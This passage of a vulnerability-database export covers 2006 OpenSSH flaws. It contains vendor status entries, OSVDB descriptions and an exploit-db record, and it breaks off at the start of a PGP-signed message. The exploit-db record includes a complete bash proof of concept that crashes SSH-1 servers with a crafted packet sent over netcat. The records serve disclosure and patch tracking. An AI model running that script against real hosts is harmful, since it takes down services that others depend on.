<http://www.debian.org/security/2006/dsa-1189>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ FreeBSD, Inc.\n\nUpdated: October 04, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://security.FreeBSD.org/advisories/FreeBSD-SA-06:22.openssh.asc>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Gentoo Linux\n\nUpdated: October 02, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.gentoo.org/security/en/glsa/glsa-200609-17.xml>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Hewlett-Packard Company\n\nUpdated: January 19, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [HPSBUX02178 SSRT061267](<http://itrc.hp.com/service/cki/docDisplay.do?docId=c00815112>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Mandriva, Inc.\n\nUpdated: October 06, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.mandriva.com/security/advisories?name=MDKSA-2006:179>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ OpenBSD\n\nUpdated: November 10, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [OpenBSD 4.0 release errata & patch list](<http://www.openbsd.org/errata.html#ssh>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ OpenPKG\n\nUpdated: October 04, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.022-openssh.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ OpenSSH\n\nUpdated: October 02, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.openssh.com/txt/release-4.4>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Red Hat, Inc.\n\nUpdated: October 02, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=207955>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ SUSE Linux\n\nUpdated: October 23, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to SUSE Security Annoucement [SUSE-SA:2006:062](<http://lists.suse.com/archive/suse-security-announce/2006-Oct/0005.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Slackware Linux Inc.\n\nUpdated: October 02, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Trustix Secure Linux\n\nUpdated: October 06, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.trustix.org/errata/2006/0054/>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Ubuntu\n\nUpdated: October 04, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.ubuntu.com/usn/usn-355-1>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ VMware\n\nUpdated: January 19, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to document [9986131](<http://kb.vmware.com/vmtnkb/search.do?cmd=displayKC&docType=kc&externalId=9986131&sliceId=SAL_Public&dialogID=8191367&stateId=0%200%208187344&doctag=Author,%20KB%20Article>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ rPath\n\nUpdated: October 02, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <https://issues.rpath.com/browse/RPL-661>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\nView all 17 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * [http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=115939141729160&w=2 ](<http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=115939141729160&w=2 >)\n * <https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=207955>\n * <http://secunia.com/advisories/22091>\n * <http://www.securityfocus.com/bid/20216>\n * <http://www.openssh.com/txt/release-4.4>\n * <https://issues.rpath.com/browse/RPL-661>\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566>)\n * <http://secunia.com/advisories/22208/>\n * <http://secunia.com/advisories/22236/>\n * <http://secunia.com/advisories/22183/>\n * <http://support.avaya.com/elmodocs2/security/ASA-2006-216.htm>\n * <http://secunia.com/advisories/22362/>\n * <http://secunia.com/advisories/22495/>\n * <http://secunia.com/advisories/23241/>\n * <http://docs.info.apple.com/article.html?artnum=305214>\n\n### Acknowledgements\n\nThis issue was reported in the OpenSSH 4.4 release notes. OpenSSH credits Tavis Ormandy of the Google Security Team for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-4924](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4924>) \n---|--- \n**Severity Metric:****** | 8.82 \n**Date Public:** | 2006-09-27 \n**Date First Published:** | 2006-10-04 \n**Date Last Updated: ** | 2007-03-13 22:01 UTC \n**Document Revision: ** | 41 \n", "modified": "2007-03-13T22:01:00", "published": "2006-10-04T00:00:00", "id": "VU:787448", "href": "https://www.kb.cert.org/vuls/id/787448", "type": "cert", "title": "OpenSSH fails to properly handle multiple identical blocks in a SSH packet", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "## Vulnerability Description\nOpenSSH (portable) contains a flaw that may allow a remote attacker to execute arbitrary code under some circumstances. When configured with GSSAPI authentication, the signal handler is prone to a race condition that could be exploited to conduct a Denial of Service and possibly execute arbitrary code. No further details have been provided.\n\nNote: On OpenSSH, this vulnerability can only be leveraged for a remote Denial of Service. The conditions for remote exploitation to execute arbitrary code are considered to be unlikely.\n## Solution Description\nUpgrade to version 4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nOpenSSH (portable) contains a flaw that may allow a remote attacker to execute arbitrary code under some circumstances. When configured with GSSAPI authentication, the signal handler is prone to a race condition that could be exploited to conduct a Denial of Service and possibly execute arbitrary code. No further details have been provided.\n\nNote: On OpenSSH, this vulnerability can only be leveraged for a remote Denial of Service. The conditions for remote exploitation to execute arbitrary code are considered to be unlikely.\n## References:\nVendor Specific News/Changelog Entry: http://marc.theaimsgroup.com/?l=openbsd-cvs&m=115589252024127&w=2\nVendor Specific News/Changelog Entry: http://openssh.org/txt/release-4.4\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:179)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-216.htm)\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata.html#ssh)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-355-1)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200611-06.xml)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Oct/0005.html)\n[Vendor Specific Advisory URL](http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html)\n[Secunia Advisory ID:22173](https://secuniaresearch.flexerasoftware.com/advisories/22173/)\n[Secunia Advisory ID:22183](https://secuniaresearch.flexerasoftware.com/advisories/22183/)\n[Secunia Advisory ID:22236](https://secuniaresearch.flexerasoftware.com/advisories/22236/)\n[Secunia Advisory ID:24805](https://secuniaresearch.flexerasoftware.com/advisories/24805/)\n[Secunia Advisory ID:24799](https://secuniaresearch.flexerasoftware.com/advisories/24799/)\n[Secunia Advisory ID:22158](https://secuniaresearch.flexerasoftware.com/advisories/22158/)\n[Secunia Advisory ID:22245](https://secuniaresearch.flexerasoftware.com/advisories/22245/)\n[Secunia Advisory ID:22362](https://secuniaresearch.flexerasoftware.com/advisories/22362/)\n[Secunia Advisory ID:22352](https://secuniaresearch.flexerasoftware.com/advisories/22352/)\n[Secunia Advisory ID:22495](https://secuniaresearch.flexerasoftware.com/advisories/22495/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Secunia Advisory ID:22196](https://secuniaresearch.flexerasoftware.com/advisories/22196/)\n[Secunia Advisory ID:22208](https://secuniaresearch.flexerasoftware.com/advisories/22208/)\n[Secunia Advisory ID:22270](https://secuniaresearch.flexerasoftware.com/advisories/22270/)\n[Secunia Advisory ID:22823](https://secuniaresearch.flexerasoftware.com/advisories/22823/)\n[Secunia Advisory ID:22926](https://secuniaresearch.flexerasoftware.com/advisories/22926/)\n[Secunia Advisory ID:23680](https://secuniaresearch.flexerasoftware.com/advisories/23680/)\nRedHat RHSA: RHSA-2006:0698\nRedHat RHSA: RHSA-2006:0697-9\nRedHat RHSA: RHSA-2006:0697\nOther Advisory URL: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:22.openssh.asc\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1189\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1212\nOther Advisory URL: http://www-unix.globus.org/mail_archive/security-announce/2007/04/msg00000.html\nISS X-Force ID: 29254\n[CVE-2006-5051](https://vulners.com/cve/CVE-2006-5051)\nBugtraq ID: 20241\n", "modified": "2006-09-28T09:33:49", "published": "2006-09-28T09:33:49", "href": "https://vulners.com/osvdb/OSVDB:29264", "id": "OSVDB:29264", "title": "OpenSSH Signal Handler Pre-authentication Race Condition Code Execution", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "## Vulnerability Description\nOpenSSH contains a flaw that may allow a pre-authentication remote denial of service. The issue is triggered when SSH version 1 is used via an SSH packet that contains duplicate blocks, and will result in loss of availability for the service.\n## Technical Description\nThis issue can only be exploited when the version 1 SSH protocol is enabled.\n## Solution Description\nUpgrade to version 4.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable SSH protocol version 1 in /etc/ssh/sshd_config\n## Short Description\nOpenSSH contains a flaw that may allow a pre-authentication remote denial of service. The issue is triggered when SSH version 1 is used via an SSH packet that contains duplicate blocks, and will result in loss of availability for the service.\n## References:\nVendor Specific News/Changelog Entry: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/deattack.c?rev=1.30&content-type=text/x-cvsweb-markup\nVendor Specific News/Changelog Entry: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=207955\nVendor Specific News/Changelog Entry: http://openssh.org/txt/release-4.4\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0054/)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:179)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc)\n[Vendor Specific Advisory URL](http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-262.htm)\n[Vendor Specific Advisory URL](https://issues.rpath.com/browse/RPL-661)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Oct/0001.html)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-216.htm)\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata.html#ssh)\n[Vendor Specific Advisory URL](http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=115939141729160&w=2)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-355-1)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200609-17.xml)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Oct/0005.html)\n[Vendor Specific Advisory URL](http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html)\n[Secunia Advisory ID:22183](https://secuniaresearch.flexerasoftware.com/advisories/22183/)\n[Secunia Advisory ID:22236](https://secuniaresearch.flexerasoftware.com/advisories/22236/)\n[Secunia Advisory ID:23340](https://secuniaresearch.flexerasoftware.com/advisories/23340/)\n[Secunia Advisory ID:24805](https://secuniaresearch.flexerasoftware.com/advisories/24805/)\n[Secunia Advisory ID:24799](https://secuniaresearch.flexerasoftware.com/advisories/24799/)\n[Secunia Advisory ID:22091](https://secuniaresearch.flexerasoftware.com/advisories/22091/)\n[Secunia Advisory ID:22158](https://secuniaresearch.flexerasoftware.com/advisories/22158/)\n[Secunia Advisory ID:22245](https://secuniaresearch.flexerasoftware.com/advisories/22245/)\n[Secunia Advisory ID:22362](https://secuniaresearch.flexerasoftware.com/advisories/22362/)\n[Secunia Advisory ID:22352](https://secuniaresearch.flexerasoftware.com/advisories/22352/)\n[Secunia Advisory ID:22495](https://secuniaresearch.flexerasoftware.com/advisories/22495/)\n[Secunia Advisory ID:23241](https://secuniaresearch.flexerasoftware.com/advisories/23241/)\n[Secunia Advisory ID:21923](https://secuniaresearch.flexerasoftware.com/advisories/21923/)\n[Secunia Advisory ID:22116](https://secuniaresearch.flexerasoftware.com/advisories/22116/)\n[Secunia Advisory ID:22487](https://secuniaresearch.flexerasoftware.com/advisories/22487/)\n[Secunia Advisory ID:25608](https://secuniaresearch.flexerasoftware.com/advisories/25608/)\n[Secunia Advisory ID:22164](https://secuniaresearch.flexerasoftware.com/advisories/22164/)\n[Secunia Advisory ID:22196](https://secuniaresearch.flexerasoftware.com/advisories/22196/)\n[Secunia Advisory ID:22208](https://secuniaresearch.flexerasoftware.com/advisories/22208/)\n[Secunia Advisory ID:22270](https://secuniaresearch.flexerasoftware.com/advisories/22270/)\n[Secunia Advisory ID:22298](https://secuniaresearch.flexerasoftware.com/advisories/22298/)\n[Secunia Advisory ID:22926](https://secuniaresearch.flexerasoftware.com/advisories/22926/)\n[Secunia Advisory ID:23038](https://secuniaresearch.flexerasoftware.com/advisories/23038/)\n[Secunia Advisory ID:23680](https://secuniaresearch.flexerasoftware.com/advisories/23680/)\nRedHat RHSA: RHSA-2006:0698\nRedHat RHSA: RHSA-2006:0697\nOther Advisory URL: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:22.openssh.asc\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1189\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1212\nOther Advisory URL: http://www-unix.globus.org/mail_archive/security-announce/2007/04/msg00000.html\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102962-1\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0091.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0306.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2444\n[CVE-2006-4924](https://vulners.com/cve/CVE-2006-4924)\nBugtraq ID: 20216\n", "modified": "2006-09-25T06:34:16", "published": "2006-09-25T06:34:16", "href": "https://vulners.com/osvdb/OSVDB:29152", "id": "OSVDB:29152", "title": "OpenSSH Identical Block Packet DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "## Vulnerability Description\nOpenSSH, when configured to use GSSAPI authentication, is prone to a remote information disclosure weakness. The issue occurs due to the GSSAPI authentication routine responding differently to an attacker who lets the connection proceed normally versus aborting the connection prematurely. This different in the system's response allows an attacker to determine which accounts are valid.\n## Solution Description\nUpgrade to version 4.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nOpenSSH, when configured to use GSSAPI authentication, is prone to a remote information disclosure weakness. The issue occurs due to the GSSAPI authentication routine responding differently to an attacker who lets the connection proceed normally versus aborting the connection prematurely. This different in the system's response allows an attacker to determine which accounts are valid.\n## References:\nVendor Specific News/Changelog Entry: http://openssh.org/txt/release-4.4\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200611-06.xml)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2006-Oct/0005.html)\n[Secunia Advisory ID:22183](https://secuniaresearch.flexerasoftware.com/advisories/22183/)\n[Secunia Advisory ID:22173](https://secuniaresearch.flexerasoftware.com/advisories/22173/)\n[Secunia Advisory ID:22236](https://secuniaresearch.flexerasoftware.com/advisories/22236/)\n[Secunia Advisory ID:22158](https://secuniaresearch.flexerasoftware.com/advisories/22158/)\n[Secunia Advisory ID:22495](https://secuniaresearch.flexerasoftware.com/advisories/22495/)\n[Secunia Advisory ID:22196](https://secuniaresearch.flexerasoftware.com/advisories/22196/)\n[Secunia Advisory ID:22823](https://secuniaresearch.flexerasoftware.com/advisories/22823/)\nRedHat RHSA: RHSA-2006:0698\nRedHat RHSA: RHSA-2006:0697\nOther Advisory URL: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:22.openssh.asc\n[CVE-2006-5052](https://vulners.com/cve/CVE-2006-5052)\n", "modified": "2006-09-29T00:00:00", "published": "2006-09-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:29266", "id": "OSVDB:29266", "title": "OpenSSH GSSAPI Authentication Abort Username Enumeration", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:16:28", "bulletinFamily": "exploit", "description": "OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit. CVE-2006-4924. Dos exploits for multiple platform", "modified": "2006-09-27T00:00:00", "published": "2006-09-27T00:00:00", "id": "EDB-ID:2444", "href": "https://www.exploit-db.com/exploits/2444/", "type": "exploitdb", "title": "OpenSSH <= 4.3 p1 Duplicated Block Remote Denial of Service Exploit", "sourceData": "#!/bin/bash\n#\n# OpenSSH CRC compensation attack detection DoS PoC.\n# Tavis Ormandy <taviso@google.com>\n#\n# Yes, I really did implement crc-32 in bash.\n#\n# usage: script <hostname>\n\n# victim hostname\nhostname=${1:-localhost}\nport=${2:-22}\n\n# where the fifo is created to communicate with netcat\nfifo=/tmp/nc.$$\n\n# make the fifos\nmkfifo ${fifo}.in\nmkfifo ${fifo}.out\n\n# pre-calculated crc32 for packet header\ndeclare -i crc=0xb2240279\n\n# crc lookup table\ndeclare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419\n 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988\n 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148\n 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0\n 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8\n 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b\n 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf\n 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423\n 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87\n 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a\n 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e\n 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162\n 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6\n 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65\n 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d\n 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5\n 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525\n 0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4\n 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c\n 0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84\n 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344\n 0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7\n 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43\n 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767\n 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3\n 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236\n 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92\n 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226\n 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82\n 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21\n 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1\n 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69\n 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661\n 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0\n 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330\n 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8\n 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d );\n\nprintf \"[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\\n\" >&2\nprintf \"[*] Attacking %s...\\n\" $hostname >&2\n\n# launch netcat coprocess\n(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) &\n\n# open file descriptors to coprocess\nexec 3>${fifo}.in 4<${fifo}.out\n\n# send identification\nprintf \"SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\\n\" >&3\n\n# read server key and spoof bytes (i only care about the spoof bytes)\nread server_identification <&4\nprintf \"[*] remote server identifies as %s.\\n\" \"${server_identification}\" >&2\n\n# read the cookie\ncookie=\"$(hexdump -n 18 -e '\"\" 8/1 \"%02x \" \" \"'<&4 | cut -d\" \" -f11-18)\"\n\nprintf \"[*] IP spoofing cookie was %s.\\n\" \"${cookie}\" >&2\n\n# now send my response\nprintf \"\\x00\\x00\\x08\\x3d\" >&3 # packet length\nprintf \"\\x00\\x00\\x00\\x03\" >&3 # packet type\nprintf \"\\x03\" >&3 # cipher type\n\n# print spoof bytes\nprintf \"\\x${cookie// /\\x}\" >&3\n\n# now calculate checksum of spoof bytes\nfor i in ${cookie}; do\n declare -i buf=0x${i}\n let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)'\ndone\n\n# now send some random crap for padding.\nfor ((i = 0; i < 2095; i++)); do\n printf \"\\x41\" >&3\n let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)'\ndone\n\nprintf \"[*] checksum should be %#x\\n\" $crc >&2\n\n# now send the checksum to server\nprintf \"$(printf \"\\\\\\x%x\\\\\\x%x\\\\\\x%x\\\\\\x%x\" $(((crc >> 24) & 0xff)) \\\n $(((crc >> 16) & 0xff)) \\\n $(((crc >> 8) & 0xff)) \\\n $(((crc >> 0) & 0xff)))\" >&3\n\nprintf \"\\x00\\x03\\xff\\xf8\" >&3 # packet length\n\n# junk\nperl -e 'print \"\\x00\"x\"262144\"' >&3\n\n# close file descriptors\nexec 3>&- 4<&-\n\nprintf \"[*] All done.\\n\" >&2\n\n# milw0rm.com [2006-09-27]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2444/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: 